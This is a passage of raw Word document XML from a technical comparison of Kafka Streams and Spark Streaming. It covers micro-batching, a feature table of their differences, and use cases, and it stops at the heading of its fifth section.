          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process real-time data streams. Unlike Kafka Streams, Spark Streaming works in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed clusters</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Spark’s processing engine and APIs. Spark Streaming works with batch-based processing and uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle data in small, continuous batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369F421A" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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icro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spark Streaming processes streams as a series of small batches. The data is collected in batches and processed in intervals (e.g., every 1 second). It provides fault tolerance by storing intermediate states in distributed storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B7B072" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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uilt on Spark</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spark Streaming builds on the core Apache Spark framework, which means it can integrate with Spark's distributed data processing capabilities, including large-scale batch processing, machine learning, and graph processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8C674" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1512"/>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mprehensive Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spark Streaming is designed to be used for more complex, large-scale analytics, and batch-to-stream integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E21D18" w14:textId="77777777" w:rsidR="00612285"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A891395">
          <v:rect id="_x0000_i3223" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E82EA19" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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3. Key Differences Between Kafka Streams and Spark Stream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7"/>
        <w:gridCol w:w="3724"/>
        <w:gridCol w:w="4273"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="13BC9C5D" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F5BACC1" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFF42B3" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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 Streams</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DAEBE05" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Spark Streaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="06EA3A9F" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C74765"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Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="090ABC98"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ightweight, client-side stream processing library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF1D0F5"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Distributed processing, requires Spark cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2B1DBE2E" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D7A3BA"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Processing Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05B0F8BB"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Event-driven</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (real-time processing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7142CF75"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icro-batching</w:t>
            </w:r>
            <w:r w:rsidRPr="0003272F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (batch-based stream processing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6DFC23B7" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F15BC29"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Integration with Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE03560"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Natively built for integration with Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="076CA4D5"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an process Kafka data, but not native to Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="79A8DFD2" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF3275A"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Ease of Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17399BE9"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Simple API, easy to use for Java developers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181F08FF"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Requires Spark infrastructure, more complex setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1511E1CB" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9F7C8A"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tate Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2779A0B6"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Supports stateful operations (e.g., aggregations)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00173326"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Stateful processing via Spark’s distributed system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="58B19080" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A0FE9EF"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Fault Tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F8E5E5D"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Built-in, stores state in Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13C71D09"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Fault-tolerant with Spark’s checkpointing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2BF484CE" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F015B1D"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lastRenderedPageBreak/>
              <w:t>Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62112E7E"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Scalable within a single instance (within Kafka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48317223"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Scalable within a distributed Spark cluster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="131343DA" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E978F60"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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77644D15"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ow latency (sub-second latency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DEE1E75"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Higher latency due to micro-batching (1+ second)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="5E7B4C66" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="651EB166"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atch Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65888087"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No batching (processing each event individually)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B79927"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Micro-batching (processing data in small batches)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4B07A7E6" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B2EE016"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Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10578F93"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Deploy as part of an application (JVM-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A2BBD3E"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Requires a Spark cluster or managed service (e.g., Databricks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="25519E00" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC0FB1E"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Windowing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296EA290"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Supports windowing operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="145F411C"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Supports windowing operations with micro-batching</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="0E83D3E8" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47271CC6"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Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4287A94D"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Easier to set up and manage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6976D2DA"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More complex due to Spark's infrastructure and setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="6EB962C5" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72653588"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Fault Tolerance Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC3A2D6"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Achieved using Kafka's replication and consumer offset management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4AAC1A"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Achieved using Spark’s checkpointing and distributed recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="0C027A0E" w14:textId="77777777" w:rsidTr="00612285">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590F0D2F"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3179BA63"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ightweight stream processing in applications using Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F03A8A"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arge-scale distributed stream processing with advanced analytics and integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56112E38" w14:textId="77777777" w:rsidR="00612285"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7C12719">
          <v:rect id="_x0000_i3224" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2710F4" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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4. Strengths and Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C24F16" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660CEF2" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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est for lightweight real-time applications</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Streams is designed for scenarios where you want to process and transform real-time data with low latency and without the need for a heavy distributed cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEFC61F" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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eamless integration with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it’s built to work with Kafka, it’s ideal when your application already relies on Kafka for messaging and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90738B" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Use Case Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD84FF" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="151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Real-time data processing in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3FAE2" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="151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Event-driven applications where each event is processed independently and in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054C9E8D" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1513"/>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Applications that need to process streams from Kafka topics with low-latency and direct feedback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B30A8" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16368808" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Best for complex, distributed analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spark Streaming is more suitable for applications that require distributed processing power for large-scale data streams. It supports advanced use cases that need massive compute resources and integration with Spark’s broader ecosystem (e.g., machine learning with MLlib).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D5D11" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Micro-batching for fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Its micro-batch approach makes it more suited to use cases where fault tolerance, stateful operations, and heavy computation are required across distributed clusters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB83DED" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151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Use Case Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C8464" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="151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Large-scale stream processing for real-time analytics (e.g., sensor data, website clickstream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDFBB42" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="151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Applications requiring batch-to-stream integration (e.g., combining historical batch data with real-time stream data for predictive analytics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F9F08" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="00612285" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1514"/>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Complex ETL processes involving real-time transformation, aggregation, and analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724B765" w14:textId="77777777" w:rsidR="00612285"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05E078">
          <v:rect id="_x0000_i3225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469C6E17" w14:textId="77777777" w:rsidR="00612285" w:rsidRPr="0003272F" w:rsidRDefault="0061228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5. When to Use Kafka Streams vs Spark Streaming:</w:t>
      </w:r>
    </w:p>
